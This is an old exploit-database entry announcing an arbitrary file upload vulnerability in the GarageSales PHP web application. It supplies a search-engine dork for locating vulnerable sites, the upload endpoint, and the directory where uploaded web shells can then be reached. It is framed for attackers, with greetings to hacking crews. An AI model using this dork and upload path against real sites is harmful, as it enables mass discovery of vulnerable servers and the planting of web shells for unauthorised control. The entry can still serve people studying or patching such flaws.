GarageSales - Arbitrary File Upload

Author: saidinh0
type: webapps
platform: php
port: 
date_added: 2010-04-08 
date_updated:  
verified: 0 
codes: OSVDB-63640 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: [GarageSales Remote Upload Vulnerability]
# Date: [06/04/2010]
# Author: [saidinh0]
# Software Link: [N/A]
# Version: [2004/2008]
# Tested on: [Linux/unix]
# CVE : [if exists]
# Code : [N/A]
#Email : cgd@hotmail.com

###################################################
| Intorduction :`|

Hi everybody , This my first bug (Remote Upload Vulnerability) and I wish you like it :p
###################################################

[Dork ]:  inurl:post.php?Category=Garage

{exploit} :  http://127.0.0.1/post.php?Category=Garage

Example : http://[site]/searchgarage/post.php?Category=Garage

After you have uploaded your shells , you will find it in this Path : http://[site]/up_files/YouRShell.php


Example : http://[site]/searchgarage/up_files/1269813788CrewSheLL.php

###################################################


Greetz To  : All my friends :p , Dos02.com Team ,Moroccan H4x0rz

--=-=-=-=-Dos02.com , owned-m.com/cc , vid2all.com -=-=-=-=--=